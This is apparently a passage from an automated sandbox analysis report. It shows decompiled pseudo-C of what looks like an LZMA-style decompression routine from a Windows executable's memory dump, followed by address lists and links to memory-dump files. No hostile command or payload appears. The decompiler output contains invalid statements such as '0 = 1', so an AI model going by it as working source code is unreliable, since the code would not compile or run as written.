								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
